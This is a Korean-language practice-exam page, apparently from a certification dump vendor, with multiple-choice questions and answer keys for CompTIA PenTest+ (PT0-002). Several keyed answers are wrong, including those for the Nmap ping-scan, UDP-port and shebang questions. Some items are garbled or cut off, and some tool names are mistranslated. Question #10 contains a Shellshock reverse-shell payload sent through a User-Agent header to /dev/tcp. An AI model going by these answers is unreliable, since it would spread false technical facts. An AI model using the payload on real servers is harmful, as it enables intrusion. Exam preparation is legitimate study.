아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

2024 년 업데이트 된 CompTIA PT0-002 시험 문제 및 모의고사, CompTIA PenTest + 인증 | SPOTO

종합적인 학습 자료로 CompTIA PenTest+ (PT0-002) 자격증에 합격할 수 있도록 준비하세요. 시험에서 성공하는 가장 좋은 방법은 최신 시험 문제로 연습하는 것입니다. 모의 침투 테스트 및 취약점 관리 작업을 포함한 다양한 주제와 시나리오를 다루는 학습 자료가 준비되어 있습니다. 모의고사, 샘플 문제, 시험 덤프, 시험 문제와 정답에 액세스하여 우수한 성적을 거두는 데 필요한 지식과 기술을 쌓을 수 있습니다. 모의 시험과 시험 시뮬레이터는 실제와 같은 시험 환경을 제공하여 시험 준비를 더욱 강화합니다. 우리의 시험 자료와 시험 답안을 활용하여 PT0-002시험에 대한 이해와 준비를 강화하세요. 학습 리소스를 통해 사이버 보안 전문 지식을 입증하고 CompTIA PenTest+ 자격증 취득에 성공할 수 있도록 철저히 준비할 수 있습니다.
다른 온라인 시험에 응시하세요
질문 #1
한 컨설팅 회사가 스코핑 중에 ROE를 작성하고 있습니다. 다음 중 ROE에 포함되어야 하는 것은 무엇인가요?
A. 평가 비용
B. 보고서 배포
C. 테스트 제한 사항
D. 책임
답변 보기
정답: C
질문 #2
다음 중 공격자들이 사용하는 일반적인 전술 및 기법과 권장되는 완화 조치에 대한 매트릭스를 제공하는 것은 무엇인가요?
A. NIST SP 800-53
B. OWASP 상위 10위
C. MITRE ATT&CK 프레임워크
D. PTES 기술 가이드라인
답변 보기
정답: C
질문 #3
모의 침투 테스터는 표적과 FTP 프로토콜이 있는 서버 사이에 온패스 공격으로 워크스테이션을 배포하여 FTP 자격 증명을 얻고자 합니다. 다음 중 이 목표를 달성하는 데 가장 적합한 방법은 무엇인가요?
A. 다음 로그인을 기다렸다가 서버에서 다운그레이드 공격을 수행합니다
B. 와이어샤크를 사용하여 트래픽을 캡처합니다
C. 서버에 대한 무차별 대입 공격을 수행합니다
D. 서버에 대한 FTP 익스플로잇을 사용합니다
답변 보기
정답: B
질문 #4
다음 중 네트워크 프로토콜과 상호 작용하기 위한 Python 클래스를 제공하는 도구는 무엇인가요?
A. 응답자
B. Impacket
C. 제국
D. 파워스플로잇
답변 보기
정답: B
질문 #5
클라이언트가 침투 테스트 검사에 다음 UDP 서비스를 포함하도록 요청했습니다: SNMP, NetBIOS 및 DNS. 다음 중 검사를 수행하는 Nmap 명령은 무엇인가요?
A. nmap -vv sUV -p 53, 123-159 10
B. nmap -vv sUV -p 53,123,161-162 10
C. nmap -vv sUV -p 53,137-139,161-162 10
D. nmap -vv sUV -p 53, 122-123, 160-161 10
답변 보기
정답: B
질문 #6
모의 침투 테스터는 회사 운영에 대한 중단을 최소화해야 하는 고객을 위한 활동을 준비 중입니다. 다음 중 수동적 정찰 도구로 간주되는 것은 무엇인가요? (두 가지를 선택하세요.)
A. 와이어샤크
B. Nessus
C. 망막
D. 트림 스위트
E. 쇼단
F. Nikto
답변 보기
정답: A
질문 #7
모의 침투 테스터가 서브넷에서 라이브 호스트를 빠르게 찾으려고 합니다. 다음 중 핑 스캔을 수행하는 명령은 무엇인가요?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
답변 보기
정답: C
질문 #8
한 모의 침투 테스터가 인터넷에 연결된 네트워크 디바이스에서 -F 옵션으로 Nmap 스캔을 실행한 결과 몇 개의 열린 포트를 발견했습니다. 추가 열거를 위해 테스터는 다음 명령을 사용하여 또 다른 검사를 실행했습니다: nmap -O -A -sS -p- 100.100.100.50 Nmap은 65,535개의 포트가 모두 필터링되었다는 결과를 반환했습니다. 다음 중 두 번째 스캔에서 가장 가능성이 높은 것은 무엇인가요?
A. 방화벽 또는 IPS가 스캔을 차단했습니다
B. 침투 테스터가 지원되지 않는 플래그를 사용했습니다
C. 엣지 네트워크 장치의 연결이 끊어졌습니다
D. 검사 결과 ICMP 에코 응답이 반환되었습니다
답변 보기
정답: D
질문 #9
일상 활동에 대한 중단을 최소화해야 하는 회사는 회사의 웹 사이트에 대한 정보 수집을 수행하기 위해 모의 침투 테스터가 필요합니다. 다음 중 테스터가 초기 정보 수집 단계에서 가장 유용하다고 생각하는 것은 무엇인가요? (두 가지를 선택하세요.)
A. IP 주소 및 하위 도메인
B. 구역 이동
C. DNS 정방향 및 역방향 조회
D. 인터넷 검색 엔진
E. 외부를 향한 개방형 포트
F. 쇼단 결과
답변 보기
정답: A
질문 #10
모의 침투 테스트가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} 다음 중 테스터가 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 스크립트를 수정해야 하는 것은 무엇인가요?
A. 익스플로잇 = {"사용자-에이전트": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. 익스플로잇 = {"사용자-에이전트": "() { 무시;};/bin/bash -i>& find / -perm -4000", "수락": "text/html,application/xhtml+xml,application/xml"}
C. 익스플로잇 = {"사용자-에이전트": "() { 무시;};/bin/sh -i ps -ef" 0>&1", "수락": "text/html,application/xhtml+xml,application/xml"}
D. 익스플로잇 = {"사용자-에이전트": "() { ignored;};/bin/bash -i>& /dev/tcp/10
답변 보기
정답: D
질문 #11
Bash에서 해석하기 위한 셸 스크립트를 개발할 때는 인터프리터 /bin/bash를 명시적으로 지정해야 합니다. 이 목적을 달성하기 위해 스크립트의 첫 줄에 사용해야 하는 문자 조합은 다음 중 어느 것인가요?
A. #
B. $
C. ##
D. #$
E. #!
답변 보기
정답: B

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.